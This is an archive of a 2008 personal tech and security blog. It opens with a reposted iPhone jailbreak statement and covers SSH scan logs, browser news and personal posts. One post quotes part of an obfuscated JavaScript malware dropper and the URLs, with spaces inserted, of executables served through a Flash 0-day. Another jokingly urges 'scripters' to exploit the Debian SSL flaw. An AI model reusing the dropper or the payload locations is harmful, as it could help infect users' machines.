We adapted our Pwnage technique to the 2.0 firmware, using a new unreleased exploit that we'd been keeping to ourselves, in the hope that Apple wouldn't patch it. This allows us to cut the signature checks out of the device bootloaders, allowing us to remove signature checking from the kernel, and enabling you to run all the custom software and patches you please.

Please note other than my facetious army suggestions, patching the bootloaders is the _only_ way to get a functional jailbreak for 2.0. Under the aforementioned definition of "real hack", there is no such thing as a "real hack" for 2.0. I hope you agree with me by now that Pwnage, the exploit it uses, and its subsequent obliteration of the device's chain of trust, is a "real hack".

More FUD is spread by this undying rumor of "Palladium" (or TPM) being used fully on Apple's devices, making it impossible for you "to play online with legit buyers." This is nothing but uninformed nonsense, and while there is the potential for some definition of trusted computing on iPhone and iPod Touch, Apple is not using it, and they have no way to remotely distinguish your pwned device from a legitimately activated one. This should have been obvious from our examples of running App Store applications next to our custom ones, but "obvious" is a very relative term.

On an unrelated note, I and the others take issue with Zibri's definition of open source. No, Linux distributions are not stealing, but our work was not released as open source, with any kind of permissive license, so the open source he brings into the discussion is entirely irrelevant. He took our work, our private exploits (such as the unreleased one we were able to use for Pwning 2.0), and without our permission (trying to defame us with fake comments, no less) used them in his work, that he made significant amounts of money on. He did this not by selling "his work", but by portraying himself as the reasonable "dev" who fought against the tyranny of the dev team and Apple, and requesting donations to his "cause" (recall his older iphone-elite.googlecode.com and his self-righteous bashing of the dev team for accepting donations; funny how principles change). Furthermore, with his millions of hits and occasionally obscene ads, he made his site into a complete money machine. So although he did not sell our work, it is more than fair to say that he made plenty of money from it.

And as to his most recent update, I'm not really sure what to say. I'd call it the swan song, but that would imply he was a swan, which is certainly not my intention. Maybe the chicken song would be more appropriate. ZiPhone was "developed" 9 months after the iPhone release, so he's justifying his lack of releases now, okay. Once again he pushes the "real hack" idea, which we hope we've already pounded sufficiently into the ground above. We're not sure how the fact that we were so popular it took down multiple unmetered gigabit servers is a point in his favor. We've had close to a third of his total visits since last week.

I want to dedicate a special paragraph to something that's been bugging us for a while, too. The myth that ZiPhone never harmed a phone. Certainly, we all know that iPhones are almost impossible to brick, but flashing unmatched fls/eep pairs to the baseband is plain irresponsible on Zibri's part. Does he not care about messing up phones, or does he simply not know better? And the laughable WiFi fix he released for issues that he called "user error" (actually a consequence of the above design choice) where he unconditionally set every ZiPhone WiFi MAC address to 0:Z:i:b:r:i? How did he expect that to work? It doesn't take a networking genius to figure out that two such phones on the same network would cause havoc, and indeed it did.

The following few "facts" on his blog are just more FUD. Our tools can't kill iPhones, because the only way to kill an iPhone through software (and even then just the radio) is to flash an incomplete image as the S-Gold bootloader. Apple cannot remotely kill pwned iPhones because as I mentioned earlier, it has no way to detect which iPhones are pwned.

I'm not sure why he goes on to say that you should be satisfied with Apple's AppStore. It certainly contains many good programs, but to quote Zibri just a couple of weeks earlier:

As of today you will have 2 choices:
1) Believe in the community and don't upgrade to 2.0
2) Say goodbye to Installer and freedom and upgrade.

So are you suggesting we say goodbye to freedom now? I guess we can't expect much from someone who made a reputation for himself by denouncing the devteam for accepting donations (not even soliciting them) and who now has a website full of ads, exhortations to donate, and very little content? Now we have given you a nice opportunity to upgrade to 2.0, use the AppStore _and_ use community apps. If he really wanted the good of the community, why is he not recommending it?

I would normally just ignore his entries, but as many still look at Zibri as an authority in the scene, I felt the need to dispel some of the FUD he was spreading, and finally denounce his pathetic attempts to stay relevant. Posting the latest root filesystem key after we release PwnageTool? PwnageTool exposes all the keys right within its plist files. And if he knew about the DFU exploit all along, as he implies, why didn't he take advantage of it? We would like to see him write up an article on how it all works, just to prove that Zibri knows all.

Thank you for your patience reading this. We will continue working hard on providing quality hacks and software, but please, to anyone who's tempted, stop spreading bullshit about us and our work. source

vrijdag 18 juli 2008

How big is your I-EGO?

My I-EGO is pretty big, people tell me. But how big is it really? Time to find out!

Enter your name & domain and let the www.egosurf.org do the rest.

My 'mokum von Amsterdam' EGO is a mere 4700 points but I am sure your's a lot bigger :P

Shabat shalom!

donderdag 17 juli 2008

I just text to say...

I would like a pile of these, right next to the complaint & request notes.

A big pile so I could formalize & incorporate the process in my daily live.

Now who would deserve one signed by you?

zaterdag 12 juli 2008

BattleField 2: new patch 1.5 and 3 new maps

It is still secret, the current internal BETA for the long awaited BF2 1.5 patch is currently running in Spain and guess what:

3 new maps will be released with it [act of G*d clause applies].

The names of the maps I cannot reveal but there will be at least one _you_ will like :P

donderdag 10 juli 2008

Queing for the iPhone 2.0

In Rotterdam there is a [modest] queue for the T-Mobile shop that will start selling the iPhone 2.0 from 00:00 sharp.

500 phones are available to those that have no friends, no home, no sex and no lust for beer.

Mine will fall out of the air real soon now, but I can not say I am half as tense as I was with the iPhone orginal a year ago.

woensdag 9 juli 2008

SSH scanning on the rise. DENYHOSTS

DenyHosts blocked 44 new ssh user scanning hosts in the last 13 hours. That is a lot.

Normally days with >5 new hosts caught by my lone sensor are remarkable, it happens not more often then 4 times a month. This month has been truly busy however. July 1st 10 new addresses, July 3rd 14, where in the whole month of June there where 2 days with >5 [6 & 8 on the 28th & 30th. A busy month globally] with a grant total of 28 for the whole month.

Nothing advanced either, like the botnet-like scanning in May.

This is for those hosts who made it to the largest blacklist of all times.

maandag 7 juli 2008

My users are smarter then yours!

1. Firefox 221 56.81%
2. Internet Explorer 123 31.62%
3. Safari 34 8.74%
4. Opera 8 2.06%
5. Mozilla 2 0.51%
6. Netscape 1 0.26%

dinsdag 1 juli 2008

Google's Street View spycar clocked in Amsterdam, Holland

I think this is a first: a google car in Amsterdam. Photo taken on the 1st of July 2008 in Amsterdam, on the Gaasperdammerweg, Amsterdam after I picked up the car coming out of the Huigenbos [I know, all these streets do not sound like Amsterdam... but it is, techincally speaking].

Grotere kaart weergeven

In a year or so you can see me doing silly :P

dinsdag 24 juni 2008

I should have...

...written about our first meeting, where you said "Vroeger was ik een lekker stuk" and I took a photo of your legs that looked good, not to say great.

I should have written about the conversations we had.

I should have written about the nail biting, before and during the football game.

I should have because the moments mattered to me.

I should have because now they took you, after your screaming alarmed the neighbor, after your neighbor alarmed the police, after the police kicked in the door, after the police warned the ambulance, after the ambulance took you away, after the police took your cellphone, after the doctors called that after the first operation they saw little hope, and after I tried to contact your daughter, and after the second call from the doctors who said there was little hope and after that I found your daughter was informed... but all was too late.

All was too late, but disaster, 'cause it was too early. It should not have been.

Kiek, I should have...

Danke viel...

Photo taken on Monday the 23rd of June. Someone 'forgot' something :P

donderdag 19 juni 2008

BackTrack3 to be released, RSN

And they do it again: the final release of BackTrack 3 will hit the net any moment now.

Ever since I met Max at some stint at a client, I have been impressed with his bright mind and unbelievable control over the matters he works on. He did an assesment of the wlan setup I had designed and he pinpointed the weaknesses [some publicly known, others, well 'new'] and the strong points which maked up a nice report for management.

Anyway, BT3 is about to hit the tubes soon and now you know first :P

woensdag 18 juni 2008

Reasons why I do...

Add high-speed wireless data to the hottest kid on the block and me being regularly in Amsterdam with a keyboard within reach...

So this couple look a good reason to spend a couple of euroos :D

dinsdag 17 juni 2008

Reasons I do not.

Download Day 2008

Firefox 3 is about to het the Internet tubes in a couple of hours. Great, or is it?

The fact that Google Browser Sync project is not taking calls nor displaying any word about support of their essential FF extention for FF 3 has made me decide to NOT upgrade.

As much as I liked test driving FF3 [all beta's and RC's] I just do not want to browse without GBS, unless I am given no option.

So here is my appologies to the FireFox 3 team: sorry! But I will retreat my pledge to download FF3 untill GBS is available and will continue to use FF2.

Here's the google teams reply:
Thanks for trying out Google Browser Sync and for all of your feedback. It was a tough call, but we decided to phase out support for Browser Sync. Since the team has moved on to other projects that are keeping them busy, we don't have time to update the extension to work with Firefox 3 or to continue to maintain it.

For those of you who want to continue to use Firefox 2, we'll maintain support for old versions of Google Browser Sync through 2008. After that, we can recommend a few other products that scratch a similar itch. We hope that one of them works for you:

Mozilla Weave [labs.mozilla.com] from Mozilla Labs—Offers bookmark and history synchronization across computers.

Google Toolbar for Firefox [toolbar.google.com]—Store your bookmarks online and access them from any computer online.

Foxmarks Bookmark Synchronizer [addons.mozilla.org]—Synchronizes your bookmarks across all computers where it is installed.

The Google Team

But personally I do not want to change too much at a time so I will sit back, enjoy GBS for the comming couple of months, wait till FF3's bugs will be ironed out and then, maybe, switch away from GBS to one of the above mentioned 'replacements'.

vrijdag 30 mei 2008

This is sweet :D

"AuthSight uses your Mac's iSight camera to take snapshots of the nut behind the keyboard whenever an invalid password is entered, either at login or in a screensaver. AuthSight can also (optionally) email photos to you."

Get it here. Thank Zac Bedell.

woensdag 28 mei 2008

Flash: the format everybody loves to hate [at least should]

Prime time for our beloved FLASH player again: a 0-day has been actively exploited the last couple of days, as reported by Security Focus, SANS, Adobe knows not much more ATM. Served as a file with the jpg extention, that is actually a script:

http://www. play0nlnie. com/pcd/topics/ff11us/20080311cPxl31/07.jpg

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'\');2.3(\'

That in the end, downloads:
http://www. play0nlnie. com/ax.exe
http://www. play0nlnie. com/setip.exe

Virustotal was 7/31 for ax.exe, and 7/31 for setip.exe earlier this evening.

Google gives a cool 359 results for the quoted string "Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability" so word's out.

dinsdag 27 mei 2008

Arun Sarin is leaving Vodafone

What a pitty!

We lost the most out of touch CEO ever who's ideas, visions and quotes where always mindbending.

donderdag 22 mei 2008

gmail filter multiple domains

For sometime I have been wondering about how to implement my own idea of a zero inbox, and at the same time keep my filters in gmail clean and mean.

It took me a couple of searches to find the answer. It's simple:
You can separate the domains|names with a vertical bar '|' but not with a comma or the 'OR' operator. Well, actually you can use the good old 'OR' clause but then you need to use the '(' and ')' like so:

Matches: from:((@komplett.nl OR @4launch.nl OR @livinstyle.nl OR @marketing.rackspace.co.uk OR @youthink.com OR @sourceforge.net OR @klm-email.com OR @service.swiss.com OR @dienstmakkers.nl OR @amsterdam.nl OR @honestreporting.com OR @ziki.com OR @opendns.com OR @marketing.rackspace.co.uk OR @enews.sierra-news.com OR @rapidshare.com OR @weekly.gamespy.com OR @nts.nl OR @nintendo-europe.com OR @dienstmakkers.nl OR @ajax.nl @komplett.nl OR @bol.com OR @service.swiss.com OR @sans.org OR @videoland.nl OR @sovereignlife.com OR @amsterdam.nl OR @nts.nl OR @20min.ch OR @ringtonio.nl OR @2dehands.nl OR @4launch.nl OR @klm-email.com OR @davinciteam.com OR @mail.expedia.nl OR @looki.de OR @global-conflict.org OR @i3d.net OR @ebay.de OR @db2.myorc.com OR @mashmaker.intel.com OR @xing.com OR @firebrandtraining.co.uk OR @ipswitchmail.com OR @marktplaats.nl))
Do this: Skip Inbox, Apply label "XXX"

Nice. Inbox down to (243) unreads that I acually might read, one day... unless they're caught by my 'sorry, no time' filter that somehow flagged the message by triage as "dead wood".

Photo by Code Poet

maandag 19 mei 2008

Times are changing...

I am from the time that dental correction was only cool when done invisible. You would have your holes plugged, most of the time with 'amagaan' but that was for the poor [me]. The cooler people used plastic in teh colour of their teeth.

Nowadays my kids _die_ for a super visible dental correction. The more 'bling' the better.

A good thing, in my book.

vrijdag 16 mei 2008

SSH brute force botnet

Nice, I must have been a sleep the last couple of days. Since May 11 02:41:53 my logfiles [who never sleep] started logging a more 'advanced' brute force ssh attempts. See this:

May 11 02:41:53 meij sshd[23046]: Failed keyboard-interactive/pam for invalid user tomcat from port 56131 ssh2
May 11 04:36:27 meij sshd[23490]: Failed keyboard-interactive/pam for invalid user tsc from port 57240 ssh2
May 11 07:07:29 meij sshd[24482]: Failed keyboard-interactive/pam for invalid user chang from port 51730 ssh2
May 11 19:41:47 meij sshd[27408]: Failed keyboard-interactive/pam for invalid user backup from port 12491 ssh2
May 11 19:42:58 meij sshd[27411]: Failed keyboard-interactive/pam for invalid user backup from port 57552 ssh2
May 11 21:09:33 meij sshd[27738]: Failed keyboard-interactive/pam for invalid user postgres from port 59462 ssh2
May 12 01:37:24 meij sshd[29026]: Failed keyboard-interactive/pam for invalid user thomas from port 57325 ssh2
May 12 02:40:33 meij sshd[29258]: Failed keyboard-interactive/pam for invalid user franky from port 49501 ssh2
May 12 03:20:11 meij sshd[29421]: Failed keyboard-interactive/pam for invalid user majordomo from port 49959 ssh2
May 12 03:40:57 meij sshd[29482]: Failed keyboard-interactive/pam for invalid user shop from port 42187 ssh2
May 12 03:58:24 meij sshd[29541]: Failed keyboard-interactive/pam for invalid user thisuserdoesnotexists from port 58021 ssh2
[... snip ...]
May 14 01:35:26 meij sshd[14831]: Failed keyboard-interactive/pam for invalid user orant from port 45112 ssh2
May 14 01:41:32 meij sshd[14846]: Failed keyboard-interactive/pam for invalid user appen from port 47129 ssh2
May 14 01:56:11 meij sshd[14904]: Failed keyboard-interactive/pam for invalid user bohmbach from port 39950 ssh2
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from port 49358 ssh2
May 14 02:09:29 meij sshd[14992]: Failed keyboard-interactive/pam for invalid user duelsen from port 44080 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from port 47536 ssh2
May 14 02:17:27 meij sshd[15036]: Failed keyboard-interactive/pam for invalid user friebe from port 2162 ssh2
May 14 02:20:52 meij sshd[15048]: Failed keyboard-interactive/pam for invalid user friese from port 28917 ssh2
May 14 02:22:13 meij sshd[15051]: Failed keyboard-interactive/pam for invalid user fuhrhop from port 58495 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from port 42398 ssh2

1209 attempts for 654 "invalid users" in 49 busy hours from [
grep "invalid user" /var/log/messages | awk -F" " '{ print $13 }' | sort | uniq -u | wc] 53 unique addresses. Not bad. Slipped below my denyhosts radar just nicely.

donderdag 15 mei 2008

Kampioen EK2008: Rusland

Today is speculation day :D

Zwitserland - Tsjechie 2 - 1
Roemenie - Frankrijk 0 - 2
Portugal - Turkije 1 - 1
Nederland - Italie 3 - 2
Tsjechie - Portugal 2 - 1
Italie - Roemenie 2 - 1
Zwitserland - Turkije 3 - 2
Nederland - Frankrijk 0 - 2
Zwitserland - Portugal 1 - 2
Nederland - Roemenie 2 - 1
Turkije - Tsjechie 0 - 0
Frankrijk - Italie 1 - 2

Oostenrijk - Kroatie 1 - 1
Spanje - Rusland 1 - 2
Duitsland - Polen 1 - 0
Griekenland - Zweden 1 - 3
Kroatie - Duitsland 1 - 2
Zweden - Spanje 0 - 2
Oostenrijk - Polen 3 - 1
Griekenland - Rusland 1 - 2
Polen - Kroatie 1 - 1
Griekenland - Spanje 0 - 2
Oostenrijk - Duitsland 3 - 4
Rusland - Zweden 2 - 1

Zwitserland - Oostenrijk 3 - 1
Duitsland - Tsjechie 2 - 0

Frankrijk - Spanje 3 - 1
Rusland - Italie 2 - 1

Zwitserland - Duitsland 3 - 1
Spanje - Rusland 0 - 1

Zwitserland - Rusland 2 - 3

Kampioen EK2008: Rusland

Speculation SSL Ubuntu & Thawte

Hmm, considering the fact that Mark Schuttleworth is the founder of both Thawte and Ubuntu...

And Ubuntu is Debian based

And Debian's SSL suffers from a giant randomness issue

And www.thawte.com runs on Ubuntu

And Ubuntu is a large Certificate Authority

Does that insinuate all Thawte certificates are ready for a review? :P

A great day for scripters!

Last months have been good for the security market. SPAM rose [it has been since 30 years but who is counting?], BOTNETS grew, CC snooping went bigger and the list was nicely added with two, well, astounding issues within the last 24 hours.

First we have a crypto nub who decides to remove basically all randomness [the seed used for PRNG (Pseudo Random Number Generator) used when creating SSL keys] from SSL in Debian. That did not happen last week, nor last month, not even last year, but on Tue May 2 16:34:53 2006 UTC. For reasons that have been mentioned over and over again, not security people should not, repeat NOT fiddle with security issues. Specially not packagers who just want things to install cleanly and silently. That bad.

In this case an unnamed individual did not like what he saw as uninitialized data, he removed one line:
That was enough to make ALL SLL certificates [and thus too the SSH keys that are based on SSL] generated on these systems a randomness that is limited to 32.768 options [all possible PID's on UNIX... That sounds a lot to humans, to computers that is nothing and to crypto it is fcuk all. It is so small that all possible keys have been generated in about two hours for the 1024-bit DSA and 2048-bit RSA keys for x86. HD Moore used 31 Xeon cores clocked at 2.33Ghz to do this.

Luckily for the researchers, HD Moore of metasploit moved quickly and created the OpenSSL Debian toolset WITHIN 24 HOURS[!!!] to toy with the issue.

Thank you. Scripters of the world: unite and have a ball!

To bring the issues a little closer to your mom & pop [who hardly depend on SSH], Aviv Raff decided to post a real nice and nifty 0-day for IE. Scripters of the world, you know what to do.

This is a particular nasty one, not just because it affects about 60% of all browsers in the world but also because our friends in Redmond just pushed out their monthly 'updates' so it will take at least another month before a patch is available, let alone the time it takes for mom & pop to actually update their IE.

So life is good, money there is to be made for us security people. Or is it?